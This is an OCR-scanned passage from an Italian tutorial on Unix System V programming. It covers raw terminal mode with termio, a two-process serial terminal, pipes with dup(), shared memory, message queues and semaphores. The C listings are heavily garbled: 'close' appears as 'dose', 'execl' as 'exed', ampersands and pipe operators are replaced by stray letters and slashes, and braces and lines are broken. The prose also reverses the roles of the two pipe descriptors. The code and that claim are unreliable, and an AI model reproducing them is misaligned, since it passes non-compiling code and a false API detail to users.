Nel seguente esempio viene dimostrato il comportamento della read con il flag canonico 
attivo e poi azzerato. 



^include <termio. h> 



struct termio old; 



main ( ) 
{ 



char bl[5] ,b2[5] ; 
int n; 

struct termio cbuff; 
ioctl (0, TCGETA, Scbuff) ; 
old= cbuff; 
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cbuff. c_cc [4] = 5; 






cbuff.c_cc[5] = 1; 






n = read(0,bl, 5) ; 






printf (" \n\nLa read ha ricevuto %d 


car . 


%s ",n,bl) ; 


printf ("\n\nOra setto il flag canonico e 


\n 


la read non attenderà più' una riga 


intera 


. \n\n"); 


ioctl (0, TCSETA, &cbuff) ; 






n = read (0, b2, 5) ; 






printf (" \n\nLa read ha ricevuto %d 


car . : 


%s\n",n,b2) ; 


ioctl (0, TCSETA, Sold) ; 







In alcuni casi e' necessario settare il terminale in modo >aw' per fare in modo che non 
venga eseguita nessuna particolare elaborazione sui caratteri di I/O. 
Per eseguire quest' operazione e' necessario azzerare il flag OPOST in c_flag, disabilitare 
il controllo di flusso con IXON, azzerare ECHO, annullare l'interpretazione dei caratteri di 
controllo con l'azzeramento di BRKINT ed ISIG. 

Un altra cosa importante e' quella di, come nell'esempio precedente, azzerare ICANON 
e di settare MIN e TIME. 

Una generica funzione atta a settare in modo RAW il terminale e' la seguente. 

void setraw() 
{ 

struct termio tbuf; 

if (ioctl (0, TCGETA, &tbuf) == -1) { 
perror ("Ioctl") ; 
exit (-1) ; 

} 

tbuf. C_if lag &= ~(INLCR \ ICRNL \ IUCLC \ ISTRIP \ IXON / 
BRKINT) ; 

tbuf. c_of lag &= ~OPOST; 

tbuf. c_lf lag &= ~( ICANON j ISIG / ECHO); 
tbuf. c_cc[4] = 5; 
tbuf . c_cc[5] = 2; 

if (ioctl (0,TCSETAF, & tbuf) == -1) { 
perror ("Ioctl ") ; 
exit (-1) ; 

} 



Vediamo un piccolo esempio di terminale che sfrutta due processi per eseguire le funzioni di 
ricezione e trasmissione. 

^include <termio. h> 
^include <fcntl . h> 
^include <sys/types .h> 
^include <sys/ioctl . h> 
^include <signal .h> 

static struct termio triti; 

int fd; 

reset () 
{ 

ioctl (0, TCSETA, &trm) ; 

} 

void setraw() 
{ 

static struct termio n; 
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ioctl (0, TCGETA, Sn) ; 
trm= n; 

n.c_±flag S= ~ ( INLCR / ICRNL \ IUCLC \ I STRIP / IXON j BRKINT) ; 

n . c_oflag S= ~OPOST; 

n.c_lflag S= ~ (ICANONI ISIG/ECHO) ; 

n.c_cc[4] = 5; 

n.c_cc[5] = 2; 

ioctl (0, TCSETAF, &n) ; 



errore (string) 
char *str±ng; 
{ 

printf ( " \n \nERRORE : %s\n\n" , string) ; 
sleep (2) ; 
exit (-1) ; 

} 

main (argc, argv) 
int argc; 
char *argv[]; 
{ 

int pid, status; 
int baud, flags; 
char rcvd[5]; 

static struct termio n; 

if (argc < 3) 
errore ("tenti bauds ttyxx") ; 
baud = atoi (argv[l] ) ; 
switch (baud) { 
case 300: 

flags = B300; 

break; 
case 1200: 

flags = B1200; 

break; 
case 2400: 

flags = B2400; 

break; 
deafult : 

errore ("Il baud rate può' essere 1200 o 

2400") ; 
} 

if((fd = open(argv[2] ,0_RDWR) ) == -1) 

errore ("Il terminale specificato non esiste") ; 
ioctl (fd, TCGETA, Striti) ; 

triti. c_cf lag &= ~ (CBAUD/PARENB/CSIZE) ; 

triti. c_cf lag /= (CLOCAL I HUPCL I flags jCS8) ; 

triti. c_lf lag &= ~ECHO; 

triti. c_cc [4] = 1; 

triti. c_cc [5] = 0; 

ioctl (fd, TCSETA, Striti) ; 

setrawf) ; 

if((pid = fork()) == -1) 
errore ("Creazione processo") ; 

if('.pid) { 
while(l) { 

if(read(fd,rcvd,l) > 0) 
write (1, rcvd, 1) ; 

} 

) 
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slgnal (SIGINT, SIG_IGN) ; 
while(l) { 
if(read(0, rcvd, 1) > 
if(rcvd[0] == ' 
kill (pid, SIGINT) ; 
reset () ; 

puts ( " \nTerminato 
wait (Sstatus) ; 
exit (0) ; 
ì 

write (fd, rcvd, 1) ; 

} 



0) { 
\033') 



'); 



La chiamata dovrà' avere come argomenti la velocita' desiderata e il nome del terminale. 
Ad esempio 

Una parte importante della trattazione sulle chiamate di sistema deve essere dedicata alla 
comunicazione tra i processi. 

Le argomentazioni teoriche le abbiamo viste nella prima parte del fascicolo. 
Dicevamo che uno dei metodi a disposizione sotto Unix SysV e' offerto dalle pipeline. 
La chiamata di sistema pipe() restituisce due descrittori di file che l'utente può' utilizzare per 
abbinarci lo standard d'output di un primo processo e lo standard d'input di un secondo. 
La sintassi : 



In pratica un processo utilizzerà' fd[0] per scrivere all'interno della pipe mentre l'altro processo 
leggera' da fd[1 ]. 

Se non viene utilizzato fcntl() per settare il flag 0_NDELAY normalmente questo viene 
cancellato per cui ogni operazione di write che tenti di scrivere in una pipe piena 
provvoca la sospensione del processo fino a che il secondo, leggendo, libera dello spazio. 
I descrittori restituiti dalla pipe() resistono alla chiamata ad una funzione fork() per cui e' in 
questo modo e' possibile eseguire una comunicazione tra processi "parenti". 
La funzione pipe() restituisce un errore se non ci sono descrittori a disposizione e cioè' 
se il numero dei descrittori aperti e' maggiore di 18. 

Nel seguente esempio vengono creati due processi figli i quali si interessano rispettivamente 
di lanciare mediante chiamate exec() i comandi who e sort. 
Mediante una pipe collega l'output di who all'input di sort. 
Discuteremo dopo l'esempio della funzione dup() utilizzata nel listato. 

#include<stdio . h> 



main () 
{ 

int proc_a, proc_b; 

int fd[2]; 

±f(pipe(fd) == -1) { 
perror ( "Pipe ") ; 
exit (-1) ; 

} 

if((proc_a = fork())) 
if((proc_b = fork())) { 
dose (fd[0]); 
dose (fd[l]); 
wait ( (int *) NULL) ; 
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} else { 

dose (0) ; 
dup(fd[0]); 
dose (fd[OJ) ; 
dose (fd[l]); 

exed (" /bin/sort" , "sort", (char *)NULL) ; 

} 

} else { 
dose (1) ; 
dup(fd[l]); 
dose (fd[0]); 
dose (fd[l]); 

exed ("/bin/who", "who", (char *)NULL); 
ì 

ì 

Prima di poter descrivere funzionalmente l'esempio bisogna definire l'uso della funzione 
dup(). 

Vediamone la sintassi : 

int dup(fd) 
intfd; 

La funzione dup() duplica il descrittore di un file esistente garantendo di restituire come 
identificatore del file il numero più' basso disponibile. 

E' proprio su questa caratteristica che si bassa il metodo utilizzato per ridirigere sulla 
pipe l'output di un processo e l'input dell'altro. 

Come abbiamo già' detto in passato un processo eredita tre descrittori di file già' aperti. 
Si tratta di STDIN , STDOUT e di STDERR. 

Il processo padre dopo aver creato una pipe e aver salvato i descrittori di questa in fd[2] 
crea un processo figlio che chiude lo standard d'output corrispondente al descrittore di file 1 . 
fd[1] corrisponde al canale di scrittura della pipe. 

La funzione dup() duplicando il descrittore del canale di scrittura della pipe restituisce il 
valore più' basso che caso strano corrisponde al descrittore 1 appena liberato dalla 
chiusura di STDOUT. 

Quindi a questo punto il descrittore 1, ovvero STDOUT, punterà al canale di scrittura della 
pipe. 

Successivamente vengono chiusi il canale di lettura, in quanto non utilizzato, e quello di 
scrittura, in quanto ora inutile dato che esiste STDOUT (sarebbe più' corretto dire il 
descrittore di file 1) che punta a questo. 

Il comando who eseguito, convinto di scrivere su STDOUT, scriverà' di fatto sul canale 
di scrittura della pipe. 

} else { 

dose (1) ; 
dup(fd[l]); 

dose (fd[0]) ; 
dose (fd[l]) ; 




Il secondo processo figlio chiuderà' invece STDIN ed eseguendo la stessa procedura con 
dup() assegnerà' a questo il descrittore del file di lettura della pipe. 

In questo caso il sort essendo convinto di leggere da STDIN prenderà' il suo input dal 
canale di lettura. 

} else { 
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dose (fd[0]); 
dose (fd[l]) ; 

exed("/bln/sort", "sort", (char *)NULL); 



Il caso appena visto utilizzava una pipe monodirezionale. 

Esistono alcune situazioni in cui e' utile utilizzare delle pipe bidirezionali. 

La scrittura di tali programmi risulta essere delicata in quanto e' facile creare degli stati di 

deadlock nei quali ambedue i processi rimarrebbero inchiodati ad attendere un evento che 

di fatto non accadrà' mai. 

Parlando inizialmente dei segmenti occupati dai processi avevamo visto che dopo il data 
segment esisteva una zona non allocata. 

Parlando delle pipe abbiamo anche detto che il loro compito era quello di creare un canale 
di comunicazione tra due processi differenti. 

Lo Unix SysV dispone di altre chiamate di sistema che offrono dei mezzi diversi per creare 
dei canali di comunicazione. 

Uno di questi metodi e' quello della memoria condivisa. 
Guardate il seguente schema : 





->+ +<- 

; MEMORIA : 
: CONDIVISA: 
->+ +<- 



+ + 

STACK 



+ + 

STACK 



Come si vede esiste un segmento fisico di memoria che viene abbinato a due indirizzi 
virtuali differenti da processo a processo. 

Questo avviene in quanto la memoria fisica viene mappata ad indirizzi differenti in ogni 
processo. 

Ricordatevi di questo concetto quando parleremo della funzione shmat(). 

La prima cosa da fare nel caso in cui si voglia usare la memoria condivisa e' quella di 

crearla al di fuori dello spazio di ogni processo. 

Vediamo la funzione che inizializza l'uso della memoria condivisa. 

#include <sys/types.h> 
#include <sys/ipc.h> 
#include <sys/shm.h> 

int shmget(chiave, dim, opzioni); 

key_t chiave; 
int dim; 
int opzioni; 
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In pratica shmget() restituisce il segment-ID del nuovo segmento di memoria condivisa 
creata. 

L'argomento chiave passato alla funzione specifica il nome del segmento, quello dim il 
numero di bytes richiesti mentre opzioni sono un gruppo di flags di cui vedremo ora il 
significato. 

In pratica opzioni e' costituito da 16 bit. 

I primi nove bit indicano i permessi sul segmento di memoria. 

Hanno lo stesso significato delle varie combinazioni legate ai files (diritti proprietario, 
gruppo, altri). 

Un ulteriore flags e' costituito da IPC_CREAT. 

Anche qui il legame con l'uso del flag 0_CREAT della open e' preciso. 

In pratica se il segmento di memoria richiesto non esiste e se il flag IPC_CREAT e' alzato 

allora questo Viene creato. 

Nel caso che IPC_CREAT esista già' la chiamata a shmget() ignorerà' il flag. 

Se viene specificato anche il flag IPC_EXCL allora la chiamata alla funzione restituirà' un 

errore se il segmento di memoria esiste già'. 

La seconda chiamata, shmat(), esegue la mappatura della memoria condivisa sulla memoria 
indirizzata dal processo. 
La sintassi della funzione e' : 

#include <sys/types.h> 
#include <sys/ipc.h> 
#include <sys/shm.h> 

char *shmat(sid,indirizzo_base,opzioni) 

int sid; 

char *indirizzo_base; 
int opzione; 

sid e' in pratica il segment-ID restituito dalla funzione shmget(). 

Indirizzo base invece e' l'indirizzo che si vuole mappare appartenente allo spazio 
indirizzabile dal processo. 

E' possibile specificare come 'indirizzo_base' il valore 0 forzando lo Unix a scegliersi 
dove rilocare il segmento di memoria condivisa. 

Se come indirizzo base viene specificato un valore diverso da 0 e (opzione & SHM_RND) e' 
vero allora la locazione e' data dal calcolo 



dove SHMLBA e' una costante che varia da sistema a sistema. 

Nel caso in cui indirizzo_base sia diverso da zero e (opzioni & SHM_RND) falso allora la 
locazione e' uguale a indirizzo_base. 

Vediamo un semplice esempio in cui avviene la creazione di due processi e tra questi viene 
passata una stringa. 

Si tratta di un esempio incompleto in quanto non viene eseguito nessun controllo per 

vedere se la memoria condivisa e' occupata dal processo che scrive o che legge. 

Come avevamo detto precedentemente la memoria può' essere vista come una risorsa 

"semaforizzabile". 

Quando parleremo delle funzioni per l'utilizzo dei semafori completeremo il tutto. 

#±nclude<sys/types . h> 
#include<sys/ipc . h> 
#include<sys/shm.h> 

#define SEGNAME "00100L" 

int segment_id; 

void printerror (string) 
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char *string; 
{ 

perror (string) ; 
exit (-1) ; 

ì 

main ( ) 
{ 

int status; 
char *c, *f; 

if( (segment_id = shmget ( SEGNAME , 512, 0666 \ IPC_CREAT) ) 
== -1) 

printerror ("Segment { shmget () } !"); 

if(!(fork())) { 
printf ("\nIo sono il figlio "); 
c = shmat (segment_id, 0, 0) ; 
sleep(l) ; 
printf ("\n%s ", c) ; 

} else { 
f = shmat (segment_id, 0, 0) ; 
printf ("\nIo sono il padre "); 

strcpy (f, "Questa stringa viene passata attraverso 
la memoria condivisa ") ; 
wait (&status) ; 
} 




Tra tutti i mezzi offerti dal SysV per la comunicazione tra processi sicuramente questo e' il 
più' veloce. 

Una cosa importante da ricordarsi e' la sequenza seguita per l'utilizzo della memoria 
condivisa in quanto e' molto simile, come vedremo, al metodo per l'utilizzo dei messaggi 
e dei semafori. 

In pratica prima si crea con la funzione shmget() il segmento di memoria e poi con shmat() 

lo si mappa (in altre parole lo si collega) a una parte della memoria utente. 

Una volta collegati a un certo segmento e' possibile sganciarsi mediante un altra chiamata 

e precisamente con la funzione shmdt(). 

La sintassi precisa e' la seguente : 

#include <sys/types.h> 
#include <sys/ipc.h> 
#include <sys/shm.h> 

int shmdt(indirizzo) 

char Indirizzo; 



dove indirizzo rappresenta appunto l'indirizzo del segmento da cui si vuole sganciarsi. 
Sempre appartenente alla famiglia di chiamate per il controllo della memoria condivisa 
esiste : 

#include <sys/types.h> 
#include <sys/ipc.h> 
#include <sys/shm.h> 

int shmctl(segid,comando,statusbuf) 

int segid, comando; 
struct shmid_ds *sbuf; 

La struttura shmid_ds ha il seguente formato : 
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struct shmid_ds { 

struct ipc_pena shm_perm; /* operation pena struct */ 

int shm_segsz; /* segment size */ 

ushort shm_ptbl; /* addr of sd segment */ 

ushort shm_lpid; /* pid of last shared mem op */ 

ushort shm_cpld; /* creator pid*/ 

ushort shm_nattch; /* current # attached */ 

ushort shm_cnattch; /* in-core # attached */ 

time_t shm_atime; /* last attach time */ 

time_t shm_dtime; /* last detach time */ 

time_t shm_ctime; /* last change time */ 



dove struct ipc_perm e' 



struct ipc _perm { 






ushort 


uid; 


/* 


owner's user id */ 


ushort 


gid; 


/* 


owner's group id */ 


ushort 


cuid; 


/* 


creator 's user id */ 


ushort 


cgid; 


/* 


creator 's group id */ 


ushort 


mode; 


/* 


access modes */ 


ushort 


seq; 


/* 


slot usage sequence number */ 


key_t 


key; 


/* 


key*/ 



shmctl in pratica fornisce varie operazioni di controllo sui segmenti di memoria condivisa. 
L'argomento comando può' assumere uno dei seguenti valori (definizioni in sys/ipc.h) : 

IPC_STAT - Riempie la struttura shmid_ds con i dati associati al segment-ID sempre 
passato come argomento alla chiamata della funzione. 

IPC_SET - Permette di assegnare al segment-ID i valori settati nella struttura shmid_ds. 
I parametri modificabili mediante la chiamata sono : 



shm_perm.uid 
shm_perm.gid 
shm_perm.mode 



Chiaramente la modifica e' riservata al proprietario del segmento di memoria condivisa o al 
super user. 

IPC_RMID - Un altro comando a disposizione del proprietario o del super user e' quello 
eseguito specificando IPC_RMID che in pratica rimuove l'identificatore di memoria 
condivisa distruggendo l'area di memoria associata. 

Incominciamo a vedere ora un altro metodo legato alle comunicazioni tra i processi. 
Fino ad ora abbiamo visto due metodi. 

Il primo era quello delle pipe la cui limitazione era legata al fatto che la comunicazione 
poteva avvenire solo tra processo padre e quello figlio. 

La memoria condivisa invece non era soggetta a questa limitazione in quanto qualsiasi 
processo fosse a conoscenza del segment-ID poteva accedere (permessi permettendo). 
Lo stesso possiamo dire per il metodo offerto dalla gestione dei messaggi nello Unix SysV. 
Le chiamate che permettono di creare una coda di messaggi e di gestirla sono le seguenti : 



^include <sys/types .h> 
^include <sys/ipc.h> 
#incl ude <sys/msg . h> 

int msgget (chiave, opzione) 
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key_t chiave; 
int opzione; 

La funzione ritorna -1 per segnalare un errore oppure l'I D della coda messaggi. 
Chiave costituisce il nome della coda messaggi mentre opzione potrebbe essere la 
combinazione dei seguenti valori : 

IPC_CREAT - La funzione e' simile a quella della open. Se la coda messaggi non esiste 
allora questa viene creata. Se il parametro IPC_CREAT e' specificato ma la coda esiste 
già' allora viene ignorato. 

IPC_EXCL - Serve abbinato a IPC_CREAT per fare in modo che se la coda messaggi 
esiste già' la funzione msgget() ritorni un errore. 

I nove bit meno significativi, come nel caso della funzione shmget(), indicano i permessi 
alla coda messaggi. 

Una volta creata la coda messaggi e' possibile scrivere e leggere in questa mediante le 
seguenti funzioni : 

#include <sys/types.h> 
#include <sys/ipc.h> 
#include <sys/msg.h> 

int msgsnd(msgid,messaggio,dimensione, opzione) 

int msgid, dimensione, opzione; 
struct msgbuf "messaggio; 

int msgrcv(msgid, messaggio, dimensione,tipo, opzione) 

int msgid, dimensione, opzione; 
long tipo; 

struct msgbuf 'messaggio; 

dove la struttura msgbuf e' la seguente : 

struct msgbuf { 
long mtype; 
char mtext[]; 



msgid e' l' ID della coda messaggi restituita da msgget() mentre la dimensione dell'array 
mtextrj. 

Il parametro opzione può' assumere una combinazione dei seguenti valori : 

IPC_NOWAIT - Se non c'e' spazio nel kernel per memorizzare il messaggio il processo, 
in genere, attende. Specificando questo flag invece di aspettare restituisce -1 . Questo 
nel caso della funzione msgsnd(). Nel caso che si setti IPC_NOWAIT con la funzione 
msgrcv() questa non attenderà' che venga inserito in coda un messaggio ma restituirà' -1 
per indicare che la coda e' vuota. 

MSG_NOERROR - Vale solo con la funzione msgrcv(). I messaggi che come dimensioni 
superano dimensioni (l'argomento passato alla funzione) non vengono ricevuti. 
Specificando MSG_NOERROR facciamo in modo che i messaggi più' lunghi di 
dimensioni vengano accorciati. 

Il parametro tipo specifica quale messaggio deve essere ricevuto. 
I valori possibili sono : 
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0 


Restituisce il 


primo messaggio in coda indipendentemente da tipo. 


>0 


Restituisce 


il primo messaggio che sia di tipo tipo. 


<0 


Restituisce 


il messaggio che possiede il valore minimo e minore o uguale al valore di 



L'esempio scritto come dimostrativo delle funzioni per la gestione della memoria 
condivisa potrebbe essere scritto, usando i messaggi, nel seguente modo. 

^include <sys/types .h> 
^include <sys/ipc.h> 
#±ncl ude <sys/msg . h> 



#define NAME "00100" 
int m_id; 

void printerror (string) 

char *str±ng; 

{ 

perror (string) ; 
exit (-1) ; 

} 

main ( ) 
{ 

int status; 

static struct msgbuf { 
long tipo; 
char buffer [50] ; 

} buf,buf2; 

static char f[50]; 

if((m_id = msgget (NAME, 0666 j IPC_CREAT) ) == -1) 
printerror ("Message { msgget () } !"); 

if(!(fork())) { 
printf ("\nIo sono il figlio "); 
sleep(l) ; 

msgrcv (m_id, &buf, sizeof (buf .buffer) , 0, 

MSG_NOERROR) ; 
printf ( " \n%s ", buf .buffer) ; 

} else { 
printf ("\nIo sono il padre "); 
buf 2 . tipo = 3; 

strcpy(buf2.buffer,"\nQuesto e' il 
messaggio . \n \n ") ; 
msgsnd (m_id, Sbuf2, sizeof (buf 2 . buffer) , 0) ; 
printf ("\nAttendo fine processo figlio ...."); 
wait f&status) ; 
} exit (0) ; 



In tutti gli esempi precedenti si accedeva una sola volta in scrittura e una sola volta in 
lettura utilizzando all'interno di un processo la funzione sleep() per fare in modo che la 
lettura non avvenisse prima della scrittura. 

Utilizzando, ad esempio, la memoria condivisa e' spesso necessario ricorrere all'uso di 
semafori. 

Il discorso in teoria lo abbiamo visto nella prima parte del fascicolo. 
Vediamo ora le funzioni che abbiamo a disposizione sotto Unix SysV. 

#include <sys/types.h> 
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#include <sys/mem.h> 

int semget(chiave,nsems,flags) 

key_t chiave; 
int nsems; 
int flags; 

int semop(semid,ops,nops) 
int semid; 

struct sembuf (*ops)[]; 
int nops; 



int semctl(semid,snum, corri, arg) 
int semid, snum,com; 
char *arg; 

La prima funzione, semget(), inizializza un gruppo di semafori ritornando il loro semaphore- 
ID al quale potranno riferirsi le altre funzioni operanti sui semafori. 

Gli argomenti passati sono la chiave d'identificazione dei semafori (chiave), il numero 
di semafori appartenenti a un gruppo (nsems) e i flags che regolano il comportamento 
della stessa funzione semget(). 

In modo analogo ad altre funzioni viste precedentemente abbinabili sono : 

IPC_CREAT - Se il gruppo di semafori non esiste lo crea. Nel caso contrario il flag viene 
ignorato. 

IPC_EXCL - Se questo flag viene abbinato a IPC_CREAT la funzione restituisce un codice 
d'errore se il gruppo di semafori esiste già'. 

I nove bit meno significativi sono i permessi sul gruppo di semafori. 

Vediamo ora un esempio di comunicazione tra due processi mediante l'uso della memoria 
condivisa utilizzando anche le funzioni per la gestione dei semafori. 

Si tratta di due moduli che gestiscono una certa area di memoria mediante un semplice 
algoritmo di gestione di buffer circolari. 

II primo processo richiede in input delle stringhe di caratteri dalla tastiera e li sistema nel 
buffer. 

La tastiera e' stata usata come esempio ma il tutto potrebbe essere facilmente modificato 

per prendere l'input da qualche altra sorgente. 

Il modulo che vedrete ora si interessa della trasmissione. 

#include<stdio . h> 
#include<sys/signal . h> 
#include<sys/types . h> 
#include<sys/ipc . h> 
#include<sys/shm . h> 
#include<sys/sem.h> 

typedef struct shm { 

Int pid; 

int testa, coda; 

int flag_testa, flag_coda; 

char b [2048]; 
} SHMEMORY; 

SHMEMORY*mem; 

struct sembuf o_com [1] ; 
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#define P_ID (mem->pid) 
ftdefine CODA (mem->coda) 
#define TESTA (mem->testa) 
ftdefine FCODA (mem->flag_coda) 
#define FTESTA (mem->flag_testa) 
#define CBUFF(i) (mem->b[i] ) 

#define DIM_SHM sizeof (SHMEMORY) 

key_t chiave = 123456; 



int shm_id; 
int sem_id; 
int semval; 



terminate () 
{ 

printf ("\n\nInvio segnale di terminazione 
al processo ricevente") ; 
kill (P_ID, SIGUSR1 ) ; 
printf ("\nOK! \n\n") ; 
exit (0) ; 

} 



put_ch (carat) 
char carat; 
{ 

isequal : 

if(CODA != TESTA) { 
if (TESTA == 2048) { 
TESTA = 0; 

if (FTESTA) 
FTESTA = 0; 

else 
FTESTA = 1; 
goto isequal; 

} 

CBUFF (TESTA++) = carat; 

} else { 
if (FTESTA == FCODA) 

return (-1) ; 
CBUFF (TESTA++) = carat; 

} 

return (0) ; 

) 



insert_on_buffer (stringa) 

char *stringa; 

{ 

int retvalue; 

o_com [0] . sem_op = -1 ; 

if ( (semval = semop (sem_id, o_com, 1) ) < 0) { 
perror ( "Prenotazione semaforo ") ; 
exit (-1) ; 

} 

while (* stringa) { 
retvalue = put_ch (*stringa++) ; 
if (retvalue == -1) { 

perror ( "Buffer tx pi eno ") ; 
goto nofree; 
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; 

no f ree : 

o_com [ 0 ] . sem_op = 1; 

If ( (semval = semop (sem_id, o_com, 1) ) < 0) { 
perror ( "Prenotazione semaforo ") ; 
exit (-1) ; 

} 



main ( ) 
{ 

static char utile [50]; 
signal (SIGINT, terminate) ; 

if ( (sem_id = semget (chiave, 1, 0666 1 IPC_CREAT) ) < 0) { 
perror ( "Creazi one semaforo ") ; 
exit (-1) ; 

} 

if((shm_id = shmget (chiave, DIM_SHM, 0666 1 IPC_CREAT) ) < 0) { 
perror ( "Creazione memoria condivisa") ; 
exit (-1) ; 

} 

if((mem = (SHMEMORY *) shmat (shm_id, 0 , 0) ) < 0) { 
perror ( "Mappatura memoria ") ; 
exit (-1) ; 

} 

CODA 
TESTA 

FTESTA = 0; 

FCODA = 1; 

o_com [0] . sem_num = 0; 

o_com [0] . sem_flg = SEM_UNDO; 

o_com [ 0 ] . sem_op = 1; 

if ( (semval = semop (sem_id, o_com, 1) ) < 0) { 
perror ( "Prenotazione semaforo ") ; 
exit (-1) ; 

} 

printff "STRINGHE [MAX. 50 char . ] \n \n> ") ; 

while (gets (utile) ) { 
insert_on_buffer (utile) ; 
printf (">") ; 

} 



Il seguente modulo invece si interessa della ricezione e del salvataggio dei caratteri 
ricevuti in un file. 



#include <stdio.h> 

^include <sys/signal . h> 

^include <sys/types .h> 

#incl ude <sys/ipc . h> 

#incl ude <sys/shm . h> 

#incl ude <sys/sem . h> 



FILE *fstream; 



typedef struct shm { 

int pid; /* PID del processo ricevente */ 

int testa, coda; 

int flag_testa, flag_coda; 

char b [20481; 
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j SHMEMORY; 




SHMEMORY*mem; 




int 


semval; 




struct 


sembuf 


oc om [1 ] ; 


#define 


P_ID 


(mem->pid) 


#define 


CODA 


(mem->coda) 


#define 


TESTA 


(mem->testa) 


#define 


FCODA 


(mem->flag_coda) 


#define 


FTESTA 


(mem->flag_testa) 


#define 


CBUF(i) 


(mem->b [i ] ) 


#define 


DIM_SHM sizeof (SHMEMORY) 


key_t 


chiave 


= 123456; 


int 


shm_id; 




int 


sem_id; 




terminate () 





{ 

fclose (fstream) ; 

printf ( " \nProcesso di ricezione terminato \n\n" ) ; 
exit (0) ; 

ì 

extract_from_buffer() 
{ 

ok_free : 

o_com [0] . sem_op = -1 ; 

if ( (semval = semop (sem_id, o_com, 1) ) < 0) { 
perror ( "Prenotazione semaforo ") ; 
exit (-1) ; 

} 

o_com [0] . sem_op = 1 ; 

next : 

if(CODA != TESTA II FCODA == FTESTA) { 
if(CODA == 2048) { 
CODA = 0; 
if (FCODA) 
FCODA = 0; 

else 
FCODA = 1; 

goto next; 

} 

if ( (semval = semop (sem_id, o_com, 1) ) < 0) { 
perror ( "Prenotazione semaforo ") ; 
exit (-1) ; 

} 

f printf (fstream, "%c", CBUF (CODA++) ) ; 
ì 

if ( (semval = semop (sem_id, o_com, 1) ) < 0) { 
perror ( "Prenotazione semaforo ") ; 
exit (-1) ; 

} 

ì 

main ( ) 
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int utile; 

signal (SIGUSR1, terminate) ; 

if ( (sem_id = semget (chiave, 1, 0666 / IPC_CREAT) ) < 0) { 
per r or ( "Creazione semaforo ") ; 
exit (-1) ; 

} 

if((shm_id = shmget (chiave, DIM_SHM, 0666 1 IPC_CREAT) ) < 0) { 
perror ( "Creazione memoria condivisa ") ; 
exit (-1) ; 

} 

if((mem = (SHMEMORY *) shmat (shm_id, 0, 0) ) < 0) { 
perror ( "Mappatura memoria ") ; 
exit (-1) ; 

} 

P_ID = getpid(); 

o_com [0] . sem_num = 0; 

o_ com [0] . sem_ flg = SEM_ UNDO; 

o_com [ 0 ] . sem_op = 1; 

if ( (semval = semop (sem_id, o_com, 1) ) < 0) { 
perror ( "Prenotazione semaforo ") ; 
exit (-1) ; 

} 

fstream = fopen("recvd", "w") ; 

printf ( " \n\nInizio ricezione scrivendo nel file RECVD\n"); 
while(l) 
extract_from_buffer() ; 



Nei precedenti esempi vengono utilizzate le funzioni shmget() e semget() per creare un 
segmento di memoria condivisa e un semaforo per regolare l'accesso alla prima da parte 
del processo trasmittente e da quello ricevente. 

Viene utilizzato anche un segnale per avvisare il processo ricevente che la trasmissione 
e' terminata. 

Come avevamo detto precedentemente l'utilizzo di semafori e' critico in quanto necessita 

di un severo controllo del codice al fine di evitare situazioni di deadlock. 

Nel caso di utilizzo di più' processi potrebbe verificarsi che uno di questi venga interrotto per 

qualche motivo (una signal, un errore ecc.) prima che rilasci il semaforo. 

L'altro processo che e' stato interrotto a causa del segnale di "occupato" attenderebbe 

inutilmente. 

Il problema e' raggirabile mediante l'utilizzo di SEMJJNDO nei flag passati a semop(). 
Infatti in questo caso un processo interrotto rilascerebbe il 

semaforo prima di terminare permettendo in questo modo l'accesso all'oggetto condiviso agli 
altri processi. 

Come avete potuto vedere la memoria condivisa e i semafori sono accessibili a qualsiasi 
processo (permessi permettendo). 

Se i due processi terminano la memoria condivisa e i semafori (solo uno nel caso 
precedente) rimangono in "eredita" al sistema. 
Utilizzando il comando 'ipcs -s' di Unix e' possibile avere : 



IPC status from /dev/kmem as of Mon Dee 5 23:31:59 1988 
T ID KEYMODE OWNER GROUP 

Semaphores (5.0): 




Sostituendo la vecchia funzione terminate() con la seguente vengono rilasciati sia i 
semafori che la memoria condivisa. 

terminate () 
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printf ( " \n\nInvio segnale di terminazione al 
processo ricevente") ; 
kill (P_ID, SIGUSR1) ; 

printf ("\n\n* Libero memoria condivisa."); 

shmctl (shm_id, IPC_RMID,mem) ; 

printf ("\n* Libero semforo."); 

semctl (sem_id, 0, IPC_RMID) ; 

printf ("\n\nOK! \n\n") ; 

exit (0) ; 



} 



In pratica vengono utilizzate le funzioni semctl() e shmctl() per eseguire la rimozione. 
Un successivo richiamo al comando ipcs mostrerebbe : 

IPC status from /dev/kmem as of Mon Dee 5 23:28:27 1988 
T ID KEYMODE OWNER GROUP 



Lo stesso può' essere fatto per la visualizzazione dei dati relativi ai segmenti di memoria 
condivisa. 

In pratica il comando e' 'ipcs -m'. 

Mediante ipcrm e' possibile rimuovere da Unix i semafori, i messaggi e i segmenti di 
memoria condivisa. 

In ogni caso consiglio per questo di leggere le spiegazione dei vari flags su un manuale che 
tratta la sintassi dei comandi del sistema operativo. 

Un altro esempio potrebbe essere legato alla creazione di un albero binario nella memoria 
condivisa. 

Anche in quest'esempio l'input e' da tastiera e l'output, prodotto dal programma di 
lettura, e' su video. 



^include <stdio. h> 

^include <sys/signal.h> 

^include <sys/types .h> 

#incl ude <sys/ipc . h> 

#incl ude <sys/shm . h> 

#incl ude <sys/sem . h> 

typedef struct node { 

char key[10]; 

char risposta [10] ; 

int destra, sinistra; 
} NODE; 

typedef struct shm { 

int numeronodi; 

NODE n_nodi [2000]; 
} SHMEMORY; 

SHMEMORY *mem; 

struct sembuf o_com [1] ; 

#define DIM_SHM sizeof (SHMEMORY) 

key_t chiave = 123456; 

int shm_id; 
int sem_id; 
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terminate () 
{ 

printf ("\n* Libero semforo."); 
semctl (sem_id, 0, IPC_RMID) ; 
printf ("\nOK! \n\n") ; 
exit (0) ; 

ì 

instree (key, risposta, posiz) 
char *key, *risposta; 
int *posiz; 
{ 

int utile; 

if (*posiz == -1) { 
*posiz = mem->numeronodi++ ; 
strcpy (mem->n_nodi [*posiz ] . key, key) ; 
strcpy (mem->n_nodi [*posiz ] . risposta, risposta) ; 
mem->n_nodi [*posiz ] . destra = 
mem->n_nodi [*posiz] . sinistra = —1; 

} else { 

utile = strcmp (mem->n_nodi [*posiz ] . key, key) ; 

if (utile < 0) 

instree (key, risposta, 
Smem->n_nodi [*posiz ] . destra) ; 
else 

if (utile > 0) 
instree (key, risposta, 
&mem->n_nodi [*posiz ] . sinistra) ; 
} 



insert (key, risposta, posiz) 
char *key, * risposta; 

int *posiz; 
{ 

o_com [0] . sem_op = -1 ; 

if ( (semval = semop (sem_id, o_com, 1) ) < 0) { 
perror ( "Prenotazione semaforo ") ; 
exit (-1) ; 

} 

instree (key, risposta, posiz) ; 
